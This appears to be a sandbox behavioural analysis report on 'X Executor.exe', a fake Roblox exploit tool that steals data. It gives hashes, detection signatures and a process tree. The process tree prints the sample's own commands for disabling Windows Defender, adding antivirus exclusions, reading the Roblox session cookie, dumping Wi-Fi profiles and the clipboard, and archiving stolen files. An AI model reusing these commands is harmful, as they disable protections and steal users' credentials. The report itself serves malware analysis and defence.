Analysis
-
max time kernel
39s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
18/08/2024, 13:50
Behavioral task
behavioral1
Sample
X Executor.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
X Executor.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
D�Ó�y.pyc
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
D�Ó�y.pyc
Resource
win10v2004-20240802-en
General
-
Target
X Executor.exe
-
Size
7.4MB
-
MD5
6d90c40140099de5f0e9cd712908760e
-
SHA1
5570ae57076f2ab64833c6880d5f55b56fa47d29
-
SHA256
336fec7a946aad9d8f4039f3f329e94404529d8bffd7b2780a8ad747ab2f4e32
-
SHA512
1b217dddc644896f838c13a22357e3bd76c15a8a57847b2f09275252fe984df71cc74165c30838a2f08c66fe487bf9fcdf96b6d46154f6fda18574427972e82c
-
SSDEEP
98304:7tMcZurErvz81LpWjjUlLkvzgXO9hAlaYrzzuJZYJ1JIuIdKU73bcgVowzW:7DurErvI9pWjgyvoaYrE41JIuIkoxG
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 4936 powershell.exe 4424 powershell.exe 1700 powershell.exe 3992 powershell.exe 2884 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts X Executor.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4476 powershell.exe 912 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4272 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe 4680 X Executor.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000002345b-21.dat upx behavioral2/memory/4680-25-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/files/0x000700000002344d-28.dat upx behavioral2/memory/4680-30-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/files/0x0007000000023454-47.dat upx behavioral2/memory/4680-48-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp upx behavioral2/files/0x0007000000023453-46.dat upx behavioral2/files/0x0007000000023452-45.dat upx behavioral2/files/0x0007000000023451-44.dat upx behavioral2/files/0x0007000000023450-43.dat upx behavioral2/files/0x000700000002344f-42.dat upx behavioral2/files/0x000700000002344e-41.dat upx behavioral2/files/0x000700000002344c-40.dat upx behavioral2/files/0x0007000000023460-39.dat upx behavioral2/files/0x000700000002345f-38.dat upx behavioral2/files/0x000700000002345e-37.dat upx behavioral2/files/0x000700000002345a-34.dat upx behavioral2/files/0x0007000000023458-33.dat upx behavioral2/files/0x0007000000023459-29.dat upx behavioral2/memory/4680-54-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp upx behavioral2/memory/4680-56-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp upx behavioral2/memory/4680-58-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-60-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-62-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-64-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp upx behavioral2/memory/4680-66-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-71-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-70-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-73-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx behavioral2/memory/4680-74-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-78-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp upx 
behavioral2/memory/4680-80-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp upx behavioral2/memory/4680-76-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp upx behavioral2/memory/4680-92-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-110-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-184-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-275-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-285-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-294-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx behavioral2/memory/4680-315-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-321-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-316-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-330-0x00007FFE851C0000-0x00007FFE857B0000-memory.dmp upx behavioral2/memory/4680-343-0x00007FFE98BE0000-0x00007FFE98BED000-memory.dmp upx behavioral2/memory/4680-355-0x00007FFE94660000-0x00007FFE9472D000-memory.dmp upx behavioral2/memory/4680-354-0x00007FFE94EF0000-0x00007FFE94F23000-memory.dmp upx behavioral2/memory/4680-353-0x00007FFE98D60000-0x00007FFE98D6D000-memory.dmp upx behavioral2/memory/4680-352-0x00007FFE95040000-0x00007FFE95059000-memory.dmp upx behavioral2/memory/4680-351-0x00007FFE948F0000-0x00007FFE94A66000-memory.dmp upx behavioral2/memory/4680-350-0x00007FFE94FD0000-0x00007FFE94FF3000-memory.dmp upx behavioral2/memory/4680-349-0x00007FFE991A0000-0x00007FFE991B9000-memory.dmp upx behavioral2/memory/4680-348-0x00007FFE98320000-0x00007FFE9834D000-memory.dmp upx behavioral2/memory/4680-347-0x00007FFE9C170000-0x00007FFE9C17F000-memory.dmp upx behavioral2/memory/4680-346-0x00007FFE98F70000-0x00007FFE98F94000-memory.dmp upx behavioral2/memory/4680-345-0x00007FFE84880000-0x00007FFE84DA9000-memory.dmp upx 
behavioral2/memory/4680-344-0x00007FFE94400000-0x00007FFE9451C000-memory.dmp upx behavioral2/memory/4680-342-0x00007FFE94ED0000-0x00007FFE94EE4000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 38 discord.com 39 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 36 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4316 tasklist.exe 2668 tasklist.exe 4060 tasklist.exe 4676 tasklist.exe 3168 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2472 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2968 cmd.exe 2252 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2460 cmd.exe 4816 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1528 WMIC.exe 4456 WMIC.exe 2908 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2824 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2252 PING.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3992 powershell.exe 3992 powershell.exe 4936 powershell.exe 4936 powershell.exe 3992 powershell.exe 4936 powershell.exe 2884 powershell.exe 2884 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 380 powershell.exe 380 powershell.exe 380 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4316 tasklist.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeSecurityPrivilege 1996 WMIC.exe Token: SeTakeOwnershipPrivilege 1996 WMIC.exe Token: SeLoadDriverPrivilege 1996 WMIC.exe Token: SeSystemProfilePrivilege 1996 WMIC.exe Token: SeSystemtimePrivilege 1996 WMIC.exe Token: SeProfSingleProcessPrivilege 1996 WMIC.exe Token: SeIncBasePriorityPrivilege 1996 WMIC.exe Token: SeCreatePagefilePrivilege 1996 WMIC.exe Token: SeBackupPrivilege 1996 WMIC.exe Token: SeRestorePrivilege 1996 WMIC.exe Token: SeShutdownPrivilege 1996 WMIC.exe Token: SeDebugPrivilege 1996 WMIC.exe Token: SeSystemEnvironmentPrivilege 1996 WMIC.exe Token: SeRemoteShutdownPrivilege 1996 WMIC.exe Token: SeUndockPrivilege 1996 WMIC.exe Token: SeManageVolumePrivilege 1996 WMIC.exe Token: 33 1996 WMIC.exe Token: 34 1996 WMIC.exe Token: 35 1996 WMIC.exe Token: 36 1996 WMIC.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeSecurityPrivilege 1996 WMIC.exe Token: SeTakeOwnershipPrivilege 1996 WMIC.exe Token: SeLoadDriverPrivilege 1996 WMIC.exe Token: SeSystemProfilePrivilege 1996 WMIC.exe Token: SeSystemtimePrivilege 1996 WMIC.exe Token: SeProfSingleProcessPrivilege 1996 WMIC.exe Token: SeIncBasePriorityPrivilege 1996 WMIC.exe Token: SeCreatePagefilePrivilege 1996 WMIC.exe Token: SeBackupPrivilege 1996 WMIC.exe Token: SeRestorePrivilege 1996 WMIC.exe Token: SeShutdownPrivilege 1996 WMIC.exe Token: SeDebugPrivilege 1996 WMIC.exe Token: SeSystemEnvironmentPrivilege 1996 WMIC.exe Token: SeRemoteShutdownPrivilege 1996 WMIC.exe Token: SeUndockPrivilege 1996 WMIC.exe Token: SeManageVolumePrivilege 1996 WMIC.exe Token: 33 1996 WMIC.exe Token: 34 1996 WMIC.exe Token: 35 1996 WMIC.exe Token: 36 1996 WMIC.exe Token: SeIncreaseQuotaPrivilege 1528 WMIC.exe Token: SeSecurityPrivilege 1528 WMIC.exe Token: SeTakeOwnershipPrivilege 1528 WMIC.exe Token: 
SeLoadDriverPrivilege 1528 WMIC.exe Token: SeSystemProfilePrivilege 1528 WMIC.exe Token: SeSystemtimePrivilege 1528 WMIC.exe Token: SeProfSingleProcessPrivilege 1528 WMIC.exe Token: SeIncBasePriorityPrivilege 1528 WMIC.exe Token: SeCreatePagefilePrivilege 1528 WMIC.exe Token: SeBackupPrivilege 1528 WMIC.exe Token: SeRestorePrivilege 1528 WMIC.exe Token: SeShutdownPrivilege 1528 WMIC.exe Token: SeDebugPrivilege 1528 WMIC.exe Token: SeSystemEnvironmentPrivilege 1528 WMIC.exe Token: SeRemoteShutdownPrivilege 1528 WMIC.exe Token: SeUndockPrivilege 1528 WMIC.exe Token: SeManageVolumePrivilege 1528 WMIC.exe Token: 33 1528 WMIC.exe Token: 34 1528 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1932 wrote to memory of 4680 1932 X Executor.exe 84 PID 1932 wrote to memory of 4680 1932 X Executor.exe 84 PID 4680 wrote to memory of 4328 4680 X Executor.exe 88 PID 4680 wrote to memory of 4328 4680 X Executor.exe 88 PID 4680 wrote to memory of 4996 4680 X Executor.exe 89 PID 4680 wrote to memory of 4996 4680 X Executor.exe 89 PID 4680 wrote to memory of 1864 4680 X Executor.exe 90 PID 4680 wrote to memory of 1864 4680 X Executor.exe 90 PID 4680 wrote to memory of 5076 4680 X Executor.exe 94 PID 4680 wrote to memory of 5076 4680 X Executor.exe 94 PID 4680 wrote to memory of 2040 4680 X Executor.exe 96 PID 4680 wrote to memory of 2040 4680 X Executor.exe 96 PID 5076 wrote to memory of 4316 5076 cmd.exe 98 PID 5076 wrote to memory of 4316 5076 cmd.exe 98 PID 4328 wrote to memory of 3992 4328 cmd.exe 99 PID 4328 wrote to memory of 3992 4328 cmd.exe 99 PID 2040 wrote to memory of 1996 2040 cmd.exe 100 PID 2040 wrote to memory of 1996 2040 cmd.exe 100 PID 4996 wrote to memory of 4936 4996 cmd.exe 101 PID 4996 wrote to memory of 4936 4996 cmd.exe 101 PID 1864 wrote to memory of 2304 1864 cmd.exe 102 PID 1864 wrote to memory of 2304 1864 cmd.exe 102 PID 4680 wrote to memory of 4072 4680 X Executor.exe 104 PID 4680 wrote to memory of 4072 4680 X Executor.exe 104 PID 4072 wrote to memory of 2128 4072 cmd.exe 106 PID 4072 wrote to memory of 2128 4072 cmd.exe 106 PID 4680 wrote to memory of 492 4680 X Executor.exe 107 PID 4680 wrote to memory of 492 4680 X Executor.exe 107 PID 492 wrote to memory of 504 492 cmd.exe 109 PID 492 wrote to memory of 504 492 cmd.exe 109 PID 4680 wrote to memory of 3040 4680 X Executor.exe 110 PID 4680 wrote to memory of 3040 4680 X Executor.exe 110 PID 3040 wrote to memory of 1528 3040 cmd.exe 175 PID 3040 wrote to memory of 1528 3040 cmd.exe 175 PID 4680 wrote to memory of 3380 4680 X Executor.exe 113 PID 4680 wrote to memory of 3380 4680 X Executor.exe 113 PID 3380 wrote to memory of 4456 3380 cmd.exe 
162 PID 3380 wrote to memory of 4456 3380 cmd.exe 162 PID 4680 wrote to memory of 2472 4680 X Executor.exe 116 PID 4680 wrote to memory of 2472 4680 X Executor.exe 116 PID 4680 wrote to memory of 2308 4680 X Executor.exe 117 PID 4680 wrote to memory of 2308 4680 X Executor.exe 117 PID 2472 wrote to memory of 796 2472 cmd.exe 120 PID 2472 wrote to memory of 796 2472 cmd.exe 120 PID 2308 wrote to memory of 2884 2308 cmd.exe 121 PID 2308 wrote to memory of 2884 2308 cmd.exe 121 PID 4680 wrote to memory of 1664 4680 X Executor.exe 122 PID 4680 wrote to memory of 1664 4680 X Executor.exe 122 PID 4680 wrote to memory of 1860 4680 X Executor.exe 123 PID 4680 wrote to memory of 1860 4680 X Executor.exe 123 PID 1664 wrote to memory of 2668 1664 cmd.exe 126 PID 1664 wrote to memory of 2668 1664 cmd.exe 126 PID 1860 wrote to memory of 4060 1860 cmd.exe 128 PID 1860 wrote to memory of 4060 1860 cmd.exe 128 PID 4680 wrote to memory of 3808 4680 X Executor.exe 129 PID 4680 wrote to memory of 3808 4680 X Executor.exe 129 PID 4680 wrote to memory of 912 4680 X Executor.exe 130 PID 4680 wrote to memory of 912 4680 X Executor.exe 130 PID 4680 wrote to memory of 1804 4680 X Executor.exe 133 PID 4680 wrote to memory of 1804 4680 X Executor.exe 133 PID 4680 wrote to memory of 1512 4680 X Executor.exe 135 PID 4680 wrote to memory of 1512 4680 X Executor.exe 135 PID 3808 wrote to memory of 4236 3808 cmd.exe 136 PID 3808 wrote to memory of 4236 3808 cmd.exe 136 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 796 attrib.exe 4384 attrib.exe 1700 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\X Executor.exe"C:\Users\Admin\AppData\Local\Temp\X Executor.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\X Executor.exe"C:\Users\Admin\AppData\Local\Temp\X Executor.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\X Executor.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox has updated, X executor has not.', 0, 'Error', 0+16);close()"4⤵PID:2304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\X Executor.exe"4⤵
- Views/modifies file attributes
PID:796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1804
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1512
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2460 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:1952
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2176
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"3⤵PID:4332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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4⤵
- Suspicious behavior: EnumeratesProcesses
PID:380 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ohv2uzuw\ohv2uzuw.cmdline"5⤵PID:1048
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABC1.tmp" "c:\Users\Admin\AppData\Local\Temp\ohv2uzuw\CSCD94A60C15D9C4D278BCCB3B457CF2C6.TMP"6⤵PID:4872
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4800
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3468
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1388
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:3528
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4456
-
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4120
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1364
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2160
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1528
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3764
-
C:\Windows\system32\getmac.exegetmac4⤵PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19322\rar.exe a -r -hp"22jzzuy" "C:\Users\Admin\AppData\Local\Temp\kqAYB.zip" *"3⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\_MEI19322\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI19322\rar.exe a -r -hp"22jzzuy" "C:\Users\Admin\AppData\Local\Temp\kqAYB.zip" *4⤵
- Executes dropped EXE
PID:4272
-
-
-
